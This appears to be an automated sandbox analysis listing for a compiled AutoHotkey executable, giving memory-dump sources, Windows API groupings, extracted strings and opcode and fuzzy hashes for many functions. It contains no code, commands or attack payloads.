                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
                                                                                                                                                                              • String ID: Verb: <%s>$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$%s %s$...$.exe.bat.com.cmd.hta$C:\Users\user\Desktop$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
                                                                                                                                                                              • API String ID: 187721205-1434475109
                                                                                                                                                                              • Opcode ID: 3968db029ad8d3e66e87284500ae8787545f3695a037a24b117d87ca97fb51b9
                                                                                                                                                                              • Instruction ID: 6f62d6a1c93159f937a9816b4878b059c86c2063e0ceea868771e16a936fae1d
                                                                                                                                                                              • Opcode Fuzzy Hash: 3968db029ad8d3e66e87284500ae8787545f3695a037a24b117d87ca97fb51b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 97527B32205B8095EB779F62E8507EA27A4FB48BD8F444225FB5D47BE9EB38C645C340
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$InternetLibraryOpen$FreeLoad
                                                                                                                                                                              • String ID: *$8$AutoHotkey$InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExA$wininet
                                                                                                                                                                              • API String ID: 1118542655-1258707600
                                                                                                                                                                              • Opcode ID: 9dda6862bb6cb6d395320f1e7c764055814d3e8041ec8412b42ea5d1444ba3f8
                                                                                                                                                                              • Instruction ID: 651c9e9b9ea13995745d58a18d3834e5215b36bdfc8b4330a4deca5872105af2
                                                                                                                                                                              • Opcode Fuzzy Hash: 9dda6862bb6cb6d395320f1e7c764055814d3e8041ec8412b42ea5d1444ba3f8
                                                                                                                                                                              • Instruction Fuzzy Hash: 5AC1AD72205B8286EB669B22E8507EA23A1FB8CBD8F944515BF4D07BB4DF7CC545CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Delete$Object$DestroyWindow$CursorThread$MessageSendString$ChainChangeClipboardCountCreateCriticalIconNotifyPeekPostPrioritySectionShell_SleepTickUninitialize
                                                                                                                                                                              • String ID: close AHK_PlayMe$status AHK_PlayMe mode
                                                                                                                                                                              • API String ID: 2570309754-1474590089
                                                                                                                                                                              • Opcode ID: 988ddb77dfff803cabcd832017b6ce81a8a39f0e2dc2aec634d971736a313c96
                                                                                                                                                                              • Instruction ID: 9b9916c1188f6518bedc1de11fc532d5d2bbbdc704a27a1e11cc991b7c2fc2c7
                                                                                                                                                                              • Opcode Fuzzy Hash: 988ddb77dfff803cabcd832017b6ce81a8a39f0e2dc2aec634d971736a313c96
                                                                                                                                                                              • Instruction Fuzzy Hash: 5FB1497130160086FB67DF63E8947E923A4FB9EBD5F195125AB4E47AB5CF3AC8458300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalCurrentDirectoryErrorInitializeModeSection
                                                                                                                                                                              • String ID: /ErrorStdOut$/force$/restart$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$C:\Users\user\Desktop$Clipboard$Could not close the previous instance of this script. Keep waiting?$Out of memory.$d
                                                                                                                                                                              • API String ID: 3837189584-2158089965
                                                                                                                                                                              • Opcode ID: 55a1703addd651e2ed7b0588b5d36d59236cd5c6e871c051e882d242094326d2
                                                                                                                                                                              • Instruction ID: 9c785f6b70de96b1686ce543ae4cd559ff567db452573ca88fea3f37155f9ccc
                                                                                                                                                                              • Opcode Fuzzy Hash: 55a1703addd651e2ed7b0588b5d36d59236cd5c6e871c051e882d242094326d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 420290B1604B8086FB27DB26E8543EA23A0FB9D7C8F445225FB49476B6EF78C585C704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$Load$FindIconLibraryLock$CreateEnumExtractFreeFromMetricsNamesSizeofSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 766211583-0
                                                                                                                                                                              • Opcode ID: 95c6b5e12db596f9249207a079bfe9c7874d7d4b58b5f8b4b471b46c433ac0dd
                                                                                                                                                                              • Instruction ID: dfac577ef48a5a5c120e17db4d3737aba51e79a8b467db727ab3d49fd5557cc5
                                                                                                                                                                              • Opcode Fuzzy Hash: 95c6b5e12db596f9249207a079bfe9c7874d7d4b58b5f8b4b471b46c433ac0dd
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A51B373305B9089EBBA9F17A4503AA67A1F78DBD0F184425EF4A877A4DF3DCA458700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Destroy$CurrentDirectoryMessage
                                                                                                                                                                              • String ID: C:\Users\user\Desktop$Critical Error: %sThe program will exit.
                                                                                                                                                                              • API String ID: 1189175353-1331358602
                                                                                                                                                                              • Opcode ID: 9bbeeb403c5bfc2ba8af28841df91fba33385387a113de8549a01769c38b0a30
                                                                                                                                                                              • Instruction ID: 36f37365731f2a18f040d79cdac14066c7069faa25c5d67a3cbb5e0d87956fc6
                                                                                                                                                                              • Opcode Fuzzy Hash: 9bbeeb403c5bfc2ba8af28841df91fba33385387a113de8549a01769c38b0a30
                                                                                                                                                                              • Instruction Fuzzy Hash: 75E19272608B8486F712CB2AD5543E977A0F79DBC8F145219EF89077B6CB7AD185C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID: %s\
                                                                                                                                                                              • API String ID: 2295610775-2802346739
                                                                                                                                                                              • Opcode ID: c55ea80dd8361b6dd9a7adcd8509633d83f68de654f0f718b2946b281d1a4a7b
                                                                                                                                                                              • Instruction ID: aba4fd5e3e19b987a314c6d452651bf1bdcaa1ea92963235e971e753797e3dc0
                                                                                                                                                                              • Opcode Fuzzy Hash: c55ea80dd8361b6dd9a7adcd8509633d83f68de654f0f718b2946b281d1a4a7b
                                                                                                                                                                              • Instruction Fuzzy Hash: 8551937230578181EA269B13E5103E96361FB99BE4F444326AB6D03BF9EF3CC646C704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                              • String ID: \\?\
                                                                                                                                                                              • API String ID: 48322524-4282027825
                                                                                                                                                                              • Opcode ID: 8a89e9ead25a70c40f62c924fdbe2f1e86a58242bc7418eb98cac0e4918146c8
                                                                                                                                                                              • Instruction ID: 8e41ce4198fb2cb96dbcf85ea5c427dca6283acd237d681e426d3129d309b0da
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a89e9ead25a70c40f62c924fdbe2f1e86a58242bc7418eb98cac0e4918146c8
                                                                                                                                                                              • Instruction Fuzzy Hash: E921F87770464182EF668F17E0547E923A1BB59BE4F884220EB6D076F9EB38CE84C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Post$SendTimeout$NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3597852478-0
                                                                                                                                                                              • Opcode ID: f2725e88c31a7300c498843fce3fa027501e10726dd1feaa488de8f07cb8b9b7
                                                                                                                                                                              • Instruction ID: 079ae915cdf3f31a14a1e7c6cd7841e411468b53c429aeb3cfb1b856cdf9442c
                                                                                                                                                                              • Opcode Fuzzy Hash: f2725e88c31a7300c498843fce3fa027501e10726dd1feaa488de8f07cb8b9b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 7811827531468085FFB68B2765457D91790A74DFD8F560832EF4A53BB1CA35C842C708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FocusNtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3543279991-0
                                                                                                                                                                              • Opcode ID: 8317b0577f79755d6bfc1f93b8a5c4608fa031c3c58d3545b712a417d4ade812
                                                                                                                                                                              • Instruction ID: 7db932943ab69e18b79905492fb89ee9fc002677acac39472a10d7198d4f9a34
                                                                                                                                                                              • Opcode Fuzzy Hash: 8317b0577f79755d6bfc1f93b8a5c4608fa031c3c58d3545b712a417d4ade812
                                                                                                                                                                              • Instruction Fuzzy Hash: 77F06D36314A8085D762CB53A8503D93361F74CBD0F854422EF4953B34CE74C9879708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$PostSendTimeout$NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2465591236-0
                                                                                                                                                                              • Opcode ID: 61911002ad648096312fd855c5da16de1c8ed31594efadfb8b27a8c531b4e77a
                                                                                                                                                                              • Instruction ID: 07c12cee0ed2b57fecf16b802dc470e1178529735de6d3b0dfdb9f3f06d7a3f8
                                                                                                                                                                              • Opcode Fuzzy Hash: 61911002ad648096312fd855c5da16de1c8ed31594efadfb8b27a8c531b4e77a
                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0B436314A8195E763DB63B5007D52360F34CBC8F454863EF4953A75CE74C946D344
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$PostSendTimeout$NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2465591236-0
                                                                                                                                                                              • Opcode ID: f4ea5da0687a735f126ef4b8192c11c702773a6a9f70e7de9f98a952480e11dc
                                                                                                                                                                              • Instruction ID: cb4c00f2cac1051b9df3bb20741ef702d85688ca77bbc88bbfdde92e84ff43c5
                                                                                                                                                                              • Opcode Fuzzy Hash: f4ea5da0687a735f126ef4b8192c11c702773a6a9f70e7de9f98a952480e11dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 75F08236304A8481EBB7DB9396003E527A0B74DBC8F9A4422FF56137B5CE74C8429708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$PostSendTimeout$DrawIconNtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1088757671-0
                                                                                                                                                                              • Opcode ID: fb11dcab3284c8d05e6ae30fc33d916975951350631bd17bc4de1dad67b53ddb
                                                                                                                                                                              • Instruction ID: c820e7d899a203a3af578f66b8185bdd308cecfbdef045eeb8de588360cbacb1
                                                                                                                                                                              • Opcode Fuzzy Hash: fb11dcab3284c8d05e6ae30fc33d916975951350631bd17bc4de1dad67b53ddb
                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0A735304A8081EBB3DB9356003E52791B74DBC4F894422FF55137B5CE74C8439308
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                                              • Opcode ID: 62622c34895ee0d23c1b039052e45d9227453d39b1fb03032edbf7267d90e201
                                                                                                                                                                              • Instruction ID: d7931c925492d82cbc0c6ad9b692d5af65a61181cd1847d2e2c9c98be7bcbedc
                                                                                                                                                                              • Opcode Fuzzy Hash: 62622c34895ee0d23c1b039052e45d9227453d39b1fb03032edbf7267d90e201
                                                                                                                                                                              • Instruction Fuzzy Hash: E3F08C36310A8086E2A2DB13E410BC52360B74CBC4F854822AF4813B25CE74C946D704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$Window$Message$ClassCurrentDialogDirectoryDragFinishFocusForegroundNameProcessShowThread
                                                                                                                                                                              • String ID: #32770$C:\Users\user\Desktop$MZ@
                                                                                                                                                                              • API String ID: 1886724341-3156277239
                                                                                                                                                                              • Opcode ID: 743bdd612b2ff2a1dd4a2752252140c4647a1c216253e574c6dbfa53cd8aa1e7
                                                                                                                                                                              • Instruction ID: ff748b6744ce57a4b80a0367a6368a3dc3ffdf12ee9d0cb97a70d642a2739d4d
                                                                                                                                                                              • Opcode Fuzzy Hash: 743bdd612b2ff2a1dd4a2752252140c4647a1c216253e574c6dbfa53cd8aa1e7
                                                                                                                                                                              • Instruction Fuzzy Hash: A5C1AEB1605B8086FB67CB2BA4683E927E0E78DBD4F184025EB4A07BF5DB78C445C711
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
